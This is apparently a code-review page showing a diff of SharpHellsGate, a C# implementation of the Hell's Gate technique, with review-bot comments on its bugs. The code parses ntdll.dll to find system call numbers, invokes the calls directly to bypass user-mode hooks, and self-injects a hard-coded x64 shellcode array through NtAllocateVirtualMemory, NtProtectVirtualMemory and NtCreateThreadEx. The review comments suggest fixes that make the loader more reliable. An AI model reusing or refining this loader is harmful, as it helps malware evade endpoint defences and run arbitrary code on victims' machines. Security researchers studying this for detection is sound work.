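+            Util.LogInfo($"Managed method address: 0x{pMethod:x16}");
+
+            // Get address of jited method and stack alignment
+            Int32 offset = Marshal.ReadInt32(pMethod, 1);
+            UInt64 addr = (UInt64)pMethod + (UInt64)offset;
+            while (addr % 16 != 0)
+                addr++;
+            Util.LogInfo($"Unmanaged method address: 0x{addr:x16}\n");
+
+            this.MangedMethodAddress = method.MethodHandle.GetFunctionPointer();
+            this.UnmanagedMethodAddress = (IntPtr)addr;
+            this.IsGateReady = true;
+            return true;
+        }
+
+        /// <summary>
+        /// Payload example. In this case this is a basic shellcode self-injection.
+        /// </summary>
+        public void Payload() {
+            if (!this.IsGateReady) {
+                if (!this.GenerateRWXMemorySegment()) {
+                    Util.LogError("Unable to generate RX memory segment");
+                    return;
+                }
+            }
+
+            byte[] shellcode = new byte[273] {
+                0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
+                0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
+                0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
+                0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
+                0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
+                0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
+                0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
+                0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
+                0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
+                0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
+                0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
+                0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
+                0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
+                0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
+                0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
+                0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
+                0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
+                0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
+                0x63,0x00,0xc3
+            };
+            Util.LogInfo($"Shellcode size: {shellcode.Length} bytes");
+
+            // Allocate Memory
+            IntPtr pBaseAddres = IntPtr.Zero;
+            IntPtr Region = (IntPtr)shellcode.Length;
+            UInt32 ntstatus = NtAllocateVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, IntPtr.Zero, ref Region, Macros.MEM_COMMIT | Macros.MEM_RESERVE, Macros.PAGE_READWRITE);
+            if (!Macros.NT_SUCCESS(ntstatus)) {
+                Util.LogError($"Error ntdll!NtAllocateVirtualMemory (0x{ntstatus:0x8})");
+                return;
+            }
+            Util.LogInfo($"Page address: 0x{pBaseAddres:x16}");
+
+            // Copy Memory
+            Marshal.Copy(shellcode, 0, pBaseAddres, shellcode.Length);
+            Array.Clear(shellcode, 0, shellcode.Length);
+
+            // Change memory protection
+            UInt32 OldAccessProtection = 0;
+            ntstatus = NtProtectVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, ref Region, Macros.PAGE_EXECUTE_READ, ref OldAccessProtection);
+            if (!Macros.NT_SUCCESS(ntstatus) || OldAccessProtection != 0x0004) {
+                Util.LogError($"Error ntdll!NtProtectVirtualMemory (0x{ntstatus:0x8})");
+                return;
+            }
+
+            IntPtr hThread = IntPtr.Zero;
+            ntstatus = NtCreateThreadEx(ref hThread, 0x1FFFFF, IntPtr.Zero, Macros.GetCurrentProcess(), pBaseAddres, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
+            if (!Macros.NT_SUCCESS(ntstatus) || hThread == IntPtr.Zero) {
+                Util.LogError($"Error ntdll!NtCreateThreadEx (0x{ntstatus:0x8})");
+                return;
+            }
+            Util.LogInfo($"Thread handle: 0x{hThread:x16}\n");
+
+            // Wait for one second
+            Structures.LARGE_INTEGER TimeOut = new Structures.LARGE_INTEGER();
+            TimeOut.QuadPart = -10000000;
+            ntstatus = NtWaitForSingleObject(hThread, false, ref TimeOut);
+            if (ntstatus != 0x00) {
+                Util.LogError($"Error ntdll!NtWaitForSingleObject (0x{ntstatus:0x8})");
+                return;
+            }
+        }
+    }
+}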
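Review bot: The four error-log lines in Payload() format the status as `0x{ntstatus:0x8}`, which .NET parses as a custom numeric format (zero placeholder, literal "x", literal "8") rather than the hex format the neighbouring log lines use (`0x{pMethod:x16}`), so every failure path prints the NTSTATUS as a decimal number followed by a stray "x8"; change each of them to `0x{ntstatus:x8}`. NtInvocation<T> returns `default` (a null delegate) when the gate is not ready, yet each of the four wrappers (NtAllocateVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx, NtWaitForSingleObject) calls `Func(...)` straight away, so the guarded failure becomes a NullReferenceException; `if (Func == null) return Macros.STATUS_UNSUCCESSFUL;` before each call keeps the documented status-code contract. The `OldAccessProtection != 0x0004` check in Payload() should use `Macros.PAGE_READWRITE`, which the allocation call a few lines above already spells out by name. The thread handle filled in by NtCreateThreadEx is never closed on any path, including the early returns after the wait.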
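--- /dev/null
+++ b/[path not on page] MemoryUtil.cs
@@ -0,0 +1,142 @@
+using System;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace SharpHellsGate.Module {
+    /// <summary>
+    /// Used to manipulate and extract information from a memory stream.
+    /// In this case the memory stream is the NTDLL module.
+    /// </summary>
+    public class MemoryUtil : IDisposable {
+
+        /// <summary>
+        /// The memory stream representation of the NTDLL module.
+        /// </summary>
+        protected Stream ModuleStream { get; set; }
+
+        /// <summary>
+        /// Dispose the memory stream when no longer needed.
+        /// </summary>
+        ~MemoryUtil() => Dispose();
+
+        /// <summary>
+        /// Dispose the memory stream when no longer needed.
+        /// </summary>
+        public void Dispose() {
+            this.ModuleStream.Dispose();
+            this.ModuleStream.Close();
+            GC.SuppressFinalize(this);
+        }
+
+        /// <summary>
+        /// Extract a structure from the memory stream.
+        /// </summary>
+        /// <typeparam name="T">The Type of the structure to extract.</typeparam>
+        /// <param name="offset">The offset in the memory stream where the structure is located.</param>
+        /// <returns>The structure populated or the default structure.</returns>
+        protected T GetStructureFromBlob<T>(Int64 offset) where T : struct {
+            Span<byte> bytes = this.GetStructureBytesFromOffset<T>(offset);
+            if (Marshal.SizeOf<T>() != bytes.Length)
+                return default;
+
+            IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf<T>());
+            Marshal.Copy(bytes.ToArray(), 0, ptr, bytes.Length);
+            T s = Marshal.PtrToStructure<T>(ptr);
+
+            Marshal.FreeHGlobal(ptr);
+            return s;
+        }
+
+        /// <summary>
+        /// Extract the code from a native Windows function.
+        /// </summary>
+        /// <param name="offset">The location of the function in the memory stream.</param>
+        /// <returns>The 24 bytes representing the code of the function.</returns>
+        protected Span<byte> GetFunctionOpCode(Int64 offset) {
+            Span<byte> s = stackalloc byte[24];
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            this.ModuleStream.Read(s);
+            return s.ToArray();
+        }
+
+        /// <summary>
+        /// Extract a DWORD value from the memory stream.
+        /// </summary>
+        /// <param name="offset">The location of the DWORD in the memory stream.</param>
+        /// <returns>The value of the DWORD.</returns>
+        protected UInt32 ReadPtr32(Int64 offset) {
+            Span<byte> s = stackalloc byte[4];
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            this.ModuleStream.Read(s);
+            return BitConverter.ToUInt32(s);
+        }
+
+        /// <summary>
+        /// Extract a QWORD value from the memory stream.
+        /// </summary>
+        /// <param name="offset">The location of the QWORD in the memory stream.</param>
+        /// <returns>The value of the QWORD.</returns>
+        protected UInt64 ReadPtr64(Int64 offset) {
+            Span<byte> s = stackalloc byte[8];
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            this.ModuleStream.Read(s);
+            return BitConverter.ToUInt64(s);
+        }
+
+        /// <summary>
+        /// Extract a WORD value from the memory stream.
+        /// </summary>
+        /// <param name="offset">The location of the WORD in the memory stream.</param>
+        /// <returns>The value of the WORD.</returns>
+        protected UInt16 ReadUShort(Int64 offset) {
+            Span<byte> s = stackalloc byte[2];
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            this.ModuleStream.Read(s);
+            return BitConverter.ToUInt16(s);
+        }
+
+        /// <summary>
+        /// Extract an ASCII string from the memory stream.
+        /// </summary>
+        /// <param name="offset">The location of the ASCII string in the memory stream.</param>
+        /// <returns>The ASCII string.</returns>
+        protected string ReadAscii(Int64 offset) {
+            int length = 0;
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            while (this.ModuleStream.ReadByte() != 0x00)
+                length++;
+
+            Span<byte> s = length <= 1024 ? stackalloc byte[length] : new byte[length];
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            this.ModuleStream.Read(s);
+            return Encoding.ASCII.GetString(s);
+        }
+
+        /// <summary>
+        /// Extract the byte representation of a structure from the memory stream.
+        /// </summary>
+        /// <typeparam name="T">The Type of the structure to extract from the memory stream.</typeparam>
+        /// <param name="offset">The location of the structure in the memory stream.</param>
+        /// <returns>The structure as byte span.</returns>
+        protected Span<byte> GetStructureBytesFromOffset<T>(Int64 offset) where T : struct {
+            Span<byte> s = stackalloc byte[Marshal.SizeOf<T>()];
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            this.ModuleStream.Read(s);
+            return s.ToArray();
+        }
+
+        /// <summary>
+        /// Get a specific amount of bytes at a specific location in the memory stream.
+        /// </summary>
+        /// <param name="offset">The location of the bytes to extract from the memory stream.</param>
+        /// <param name="size">The number of bytes to extract from the memory stream at a give location.</param>
+        /// <returns>The desired bytes as a byte span.</returns>
+        protected Span<byte> GetBytesFromOffset(Int64 offset, int size) {
+            Span<byte> s = size >= 1024 ? new byte[size] : stackalloc byte[size];
+            this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+            this.ModuleStream.Read(s);
+            return s.ToArray();
+        }
+    }
+}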
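Review bot: Dispose() dereferences ModuleStream unconditionally, but the property has no initializer and, on this page, is only assigned at the end of SystemModule.LoadModule, which returns false on three earlier paths without assigning it; an instance whose module never loaded therefore reaches `this.ModuleStream.Dispose()` with a null stream, and because the finalizer `~MemoryUtil() => Dispose();` routes through the same method, that NullReferenceException is raised on the finalizer thread, where it cannot be caught and terminates the process. Guard it with `this.ModuleStream?.Dispose();`, drop the redundant `Close()` after Dispose, and keep the finalizer away from managed objects altogether per the usual Dispose(bool disposing) pattern. Separately, the scan in ReadAscii, `while (this.ModuleStream.ReadByte() != 0x00)`, never terminates when no NUL byte precedes the end of the stream, since ReadByte() returns -1 at end of stream; compare against `<= 0x00` (or check the end of stream explicitly) so a truncated or malformed export name cannot hang the loader. The return value of every Read(Span<byte>) call in this class is ignored, so a short read near the end of the stream silently yields zero-filled bytes rather than an error.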
@ -0,0 +1,328 @@
|
|||
using System;
|
||||
using System.IO;
|
||||
using SharpHellsGate.Win32;
|
||||
using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Linq;
|
||||
|
||||
namespace SharpHellsGate.Module {
|
||||
|
||||
/// <summary>
|
||||
/// Wrapper around the NTDLL module.
|
||||
/// Used to extract structures and find system calls.
|
||||
/// </summary>
|
||||
public class SystemModule : MemoryUtil {
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_DOS_HEADER structure of the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_DOS_HEADER ModuleDOSHeader { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_NT_HEADERS64 structure of the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_NT_HEADERS64 ModuleNTHeaders { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_SECTION_HEADER structure from the NTDLL module.
|
||||
/// </summary>
|
||||
public List<Structures.IMAGE_SECTION_HEADER> ModuleSectionHeaders { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_EXPORT_DIRECTORY structure from the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_EXPORT_DIRECTORY ModuleExportDirectory { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the IMAGE_EXPORT_DIRECTORY structure.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' name.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressNamesOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' address.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressFunctionsOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' ordinal.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressNameOrdinalesOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Name of the module. Will be NTDLL.
|
||||
/// </summary>
|
||||
public string ModuleName { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Path of the module. Will be %WINDIR%\System32\ntdll.dll
|
||||
/// </summary>
|
||||
public string ModulePath { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// .ctor
|
||||
/// </summary>
|
||||
/// <param name="name">Name of the module</param>
|
||||
public SystemModule(string name) : base() {
|
||||
this.ModuleName = name;
|
||||
this.ModulePath = $"{Environment.SystemDirectory}\\{name}";
|
||||
this.ModuleSectionHeaders = new List<Structures.IMAGE_SECTION_HEADER>() { };
|
||||
|
||||
this.LoadModule();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Load the module into a memory stream.
|
||||
/// </summary>
|
||||
/// <returns>Whether the loading process was a success.</returns>
|
||||
public bool LoadModule() {
|
||||
if (string.IsNullOrEmpty(this.ModuleName)) {
|
||||
Util.LogError("Module name not provided");
|
||||
return false;
|
||||
}
|
||||
|
||||
if (!File.Exists(this.ModulePath)) {
|
||||
Util.LogError($"Unable to find module: {this.ModuleName}");
|
||||
return false;
|
||||
}
|
||||
|
||||
ReadOnlySpan<byte> ModuleBlob = File.ReadAllBytes(this.ModulePath);
|
||||
if (ModuleBlob.Length == 0x00) {
|
||||
Util.LogError($"Empty module content: {this.ModuleName}");
|
||||
return false;
|
||||
}
|
||||
|
||||
base.ModuleStream = new MemoryStream(ModuleBlob.ToArray());
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Reload all structures.
|
||||
/// </summary>
|
||||
/// <returns>Whether all structures were successfully reloaded.</returns>
|
||||
public bool LoadAllStructures() {
|
||||
if (this.GetModuleDOSHeader(true).Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||
return false;
|
||||
|
||||
if (this.GetModuleNTHeaders(true).Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||
return false;
|
||||
|
||||
if (this.GetModuleSectionHeaders(true).Count != this.ModuleNTHeaders.FileHeader.NumberOfSections)
|
||||
return false;
|
||||
|
||||
if (this.GetModuleExportDirectory(true).Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)))
|
||||
return false;
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the _IMAGE_DOS_HEADERstructure from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||
public Structures.IMAGE_DOS_HEADER GetModuleDOSHeader(bool ReloadCache = false) {
|
||||
if (!this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)) && !ReloadCache)
|
||||
return this.ModuleDOSHeader;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
this.ModuleDOSHeader = base.GetStructureFromBlob<Structures.IMAGE_DOS_HEADER>(0);
|
||||
if (this.ModuleDOSHeader.e_magic != Macros.IMAGE_DOS_SIGNATURE) {
|
||||
Util.LogError("Invalid DOS header signature");
|
||||
return default;
|
||||
}
|
||||
|
||||
return this.ModuleDOSHeader;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the IMAGE_NT_HEADERS64 structure from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||
public Structures.IMAGE_NT_HEADERS64 GetModuleNTHeaders(bool ReloadCache = false) {
|
||||
if (!this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) && !ReloadCache)
|
||||
return this.ModuleNTHeaders;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||
this.GetModuleDOSHeader();
|
||||
|
||||
this.ModuleNTHeaders = base.GetStructureFromBlob<Structures.IMAGE_NT_HEADERS64>(this.ModuleDOSHeader.e_lfanew);
|
||||
if (this.ModuleNTHeaders.Signature != Macros.IMAGE_NT_SIGNATURE) {
|
||||
Util.LogError("Invalid NT headers signature");
|
||||
return default;
|
||||
}
|
||||
|
||||
return this.ModuleNTHeaders;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get list of _IMAGE_SECTION_HEADER structures from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The list of _IMAGE_SECTION_HEADER structures.</returns>
|
||||
public List<Structures.IMAGE_SECTION_HEADER> GetModuleSectionHeaders(bool ReloadCache = false) {
|
||||
if (this.ModuleSectionHeaders.Count == this.ModuleNTHeaders.FileHeader.NumberOfSections && !ReloadCache)
|
||||
return this.ModuleSectionHeaders;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) || this.ModuleNTHeaders.FileHeader.Equals(default(Structures.IMAGE_FILE_HEADER)))
|
||||
this.GetModuleNTHeaders();
|
||||
|
||||
for (Int16 cx = 0; cx < this.ModuleNTHeaders.FileHeader.NumberOfSections; cx++) {
|
||||
Int64 iSectionOffset = this.GetModuleSectionOffset(cx);
|
||||
|
||||
Structures.IMAGE_SECTION_HEADER ImageSection = base.GetStructureFromBlob<Structures.IMAGE_SECTION_HEADER>(iSectionOffset);
|
||||
if (!ImageSection.Equals(default(Structures.IMAGE_SECTION_HEADER)))
|
||||
this.ModuleSectionHeaders.Add(ImageSection);
|
||||
}
|
||||
|
||||
return this.ModuleSectionHeaders;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get a _IMAGE_SECTION_HEADER structure by name.
|
||||
/// </summary>
|
||||
/// <param name="name">The name of the section.</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure if exists.</returns>
|
||||
public Structures.IMAGE_SECTION_HEADER GetModuleSectionHeaderByName(string name) {
|
||||
if (name.Length > 8) {
|
||||
Util.LogError("Invalid section name");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||
this.GetModuleSectionHeaders();
|
||||
|
||||
return this.ModuleSectionHeaders.Where(x => x.Name.Equals(name, StringComparison.OrdinalIgnoreCase)).FirstOrDefault();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the Export Address Table (aka EAT) from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>the _IMAGE_EXPORT_DIRECTORY structure</returns>
|
||||
public Structures.IMAGE_EXPORT_DIRECTORY GetModuleExportDirectory(bool ReloadCache = false) {
|
||||
if (!this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)) && !ReloadCache)
|
||||
return this.ModuleExportDirectory;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||
this.GetModuleNTHeaders();
|
||||
|
||||
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||
this.GetModuleSectionHeaders();
|
||||
|
||||
this.ModuleExportDirectoryOffset = this.ConvertRvaToOffset(this.ModuleNTHeaders.OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||
this.ModuleExportDirectory = base.GetStructureFromBlob<Structures.IMAGE_EXPORT_DIRECTORY>(this.ModuleExportDirectoryOffset);
|
||||
if (this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY))) {
|
||||
Util.LogError("Invalid export address table (EAT).");
|
||||
return default;
|
||||
}
|
||||
|
||||
// Parse all functions
|
||||
this.ModuleExportDirectoryAddressNamesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNames);
|
||||
this.ModuleExportDirectoryAddressFunctionsOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfFunctions);
|
||||
this.ModuleExportDirectoryAddressNameOrdinalesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNameOrdinals);
|
||||
return this.ModuleExportDirectory;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the address, name, system call for a given function hash.
|
||||
/// </summary>
|
||||
/// <param name="FunctionHash">DJB2 function hash.</param>
|
||||
/// <returns></returns>
|
||||
public Util.APITableEntry GetAPITableEntry(UInt64 FunctionHash) {
|
||||
if (this.ModuleExportDirectoryAddressNamesOffset == 0x00 || this.ModuleExportDirectoryAddressFunctionsOffset == 0x00|| this.ModuleExportDirectoryAddressNameOrdinalesOffset == 0x00)
|
||||
this.GetModuleExportDirectory();
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
Util.APITableEntry Entry = new Util.APITableEntry {
|
||||
Hash = FunctionHash
|
||||
};
|
||||
|
||||
for (Int32 cx = 0; cx < this.ModuleExportDirectory.NumberOfNames; cx++) {
|
||||
UInt32 PtrFunctionName = base.ReadPtr32(this.ModuleExportDirectoryAddressNamesOffset + (sizeof(uint) * cx));
|
||||
string FunctionName = base.ReadAscii(this.ConvertRvaToOffset(PtrFunctionName));
|
||||
|
||||
if (FunctionHash == Util.GetFunctionDJB2Hash(FunctionName)) {
|
||||
UInt32 PtrFunctionAdddress = base.ReadPtr32(this.ModuleExportDirectoryAddressFunctionsOffset + (sizeof(uint) * (cx + 1)));
|
||||
Span<byte> opcode = base.GetFunctionOpCode(this.ConvertRvaToOffset(PtrFunctionAdddress));
|
||||
|
||||
if (opcode[3] == 0xb8 && opcode[18] == 0x0f && opcode[19] == 0x05) {
|
||||
Entry.Name = FunctionName;
|
||||
Entry.Address = PtrFunctionAdddress;
|
||||
Entry.Syscall = (Int16)(((byte)opcode[5] << 4) | (byte)opcode[4]);
|
||||
return Entry;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return default;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the offset of a _IMAGE_SECTION_HEADER structure.
|
||||
/// </summary>
|
||||
/// <param name="cx">The section to get.</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure.</returns>
|
||||
private Int64 GetModuleSectionOffset(Int16 cx)
|
||||
=> this.ModuleDOSHeader.e_lfanew
|
||||
+ Marshal.SizeOf<Structures.IMAGE_FILE_HEADER>()
|
||||
+ this.ModuleNTHeaders.FileHeader.SizeOfOptionalHeader
|
||||
+ sizeof(Int32) // sizeof(DWORD)
|
||||
+ (Marshal.SizeOf<Structures.IMAGE_SECTION_HEADER>() * cx);
|
||||
|
||||
/// <summary>
|
||||
/// Convert a relative virtual address (RVA) into an offset.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||
/// <param name="SectionHeader">The section in which the relative virtual address (RVA) points to.</param>
|
||||
/// <returns>The offset.</returns>
|
||||
private Int64 ConvertRvaToOffset(Int64 rva, Structures.IMAGE_SECTION_HEADER SectionHeader) => rva - SectionHeader.VirtualAddress + SectionHeader.PointerToRawData;
|
||||
|
||||
/// <summary>
|
||||
/// Convert a relative virtual address (RVA) into an offset.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||
/// <returns>The offset.</returns>
|
||||
private Int64 ConvertRvaToOffset(Int64 rva) => this.ConvertRvaToOffset(rva, GetSectionByRVA(rva));
|
||||
|
||||
/// <summary>
|
||||
/// Get which image section is which a relative virtual address (RVA) points to.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure</returns>
|
||||
private Structures.IMAGE_SECTION_HEADER GetSectionByRVA(Int64 rva) => this.ModuleSectionHeaders.Where(x => rva > x.VirtualAddress && rva <= x.VirtualAddress + x.SizeOfRawData).First();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,51 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using SharpHellsGate.Module;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Main class.
|
||||
/// </summary>
|
||||
public class Program {
|
||||
|
||||
/// <summary>
|
||||
/// Entry point of the program.
|
||||
/// </summary>
|
||||
/// <param name="args">Command line arguments.</param>
|
||||
static void Main(string[] args) {
|
||||
Util.LogInfo("Copyright (C) 2020 Paul Laine (@am0nsec)");
|
||||
Util.LogInfo("C# Implementation of the Hell's Gate VX Technique");
|
||||
Util.LogInfo(" --------------------------------------------------\n", 0, "");
|
||||
|
||||
// Only works for x86
|
||||
if (IntPtr.Size != 8) {
|
||||
Util.LogError("Project only tested in x64 context.\n");
|
||||
return;
|
||||
}
|
||||
|
||||
// Load the module and get everything ready
|
||||
SystemModule ntdll = new SystemModule("ntdll.dll");
|
||||
ntdll.LoadAllStructures();
|
||||
|
||||
// Resolve all the system calls
|
||||
Dictionary<UInt64, Util.APITableEntry> APITable = new Dictionary<ulong, Util.APITableEntry>() {
|
||||
{ Util.NtAllocateVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtAllocateVirtualMemoryHash) },
|
||||
{ Util.NtProtectVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtProtectVirtualMemoryHash) },
|
||||
{ Util.NtCreateThreadExHash, ntdll.GetAPITableEntry(Util.NtCreateThreadExHash) },
|
||||
{ Util.NtWaitForSingleObjectHash, ntdll.GetAPITableEntry(Util.NtWaitForSingleObjectHash) }
|
||||
};
|
||||
ntdll.Dispose();
|
||||
|
||||
Util.LogInfo($"NtAllocateVirtualMemory: 0x{APITable[Util.NtAllocateVirtualMemoryHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtProtectVirtualMemory: 0x{APITable[Util.NtProtectVirtualMemoryHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtWaitForSingleObject: 0x{APITable[Util.NtWaitForSingleObjectHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtCreateThreadEx: 0x{APITable[Util.NtCreateThreadExHash].Syscall:x4}\n");
|
||||
|
||||
HellsGate gate = new HellsGate(APITable);
|
||||
gate.GenerateRWXMemorySegment();
|
||||
gate.Payload();
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
|
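Review bot: The return values of `ntdll.LoadAllStructures()` and of each `ntdll.GetAPITableEntry(...)` call in Main are ignored, so when ntdll.dll cannot be parsed or a hash has no match the dictionary is filled with `default` entries (Name null, Syscall 0, Address 0) and execution still reaches `gate.GenerateRWXMemorySegment()` and `gate.Payload()` with a wrong system call number. I would bail out early: `if (!ntdll.LoadAllStructures()) return;` right after construction, and before building the gate reject any failed lookup, e.g. `foreach (var e in APITable.Values) if (string.IsNullOrEmpty(e.Name)) return;`. The comment `// Only works for x86` contradicts the check under it, which refuses anything but a 64-bit process; `// Only works for x64` matches the code. What `GenerateRWXMemorySegment` and `Payload` do with a zero entry is in the `HellsGate` class, which is outside this view.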
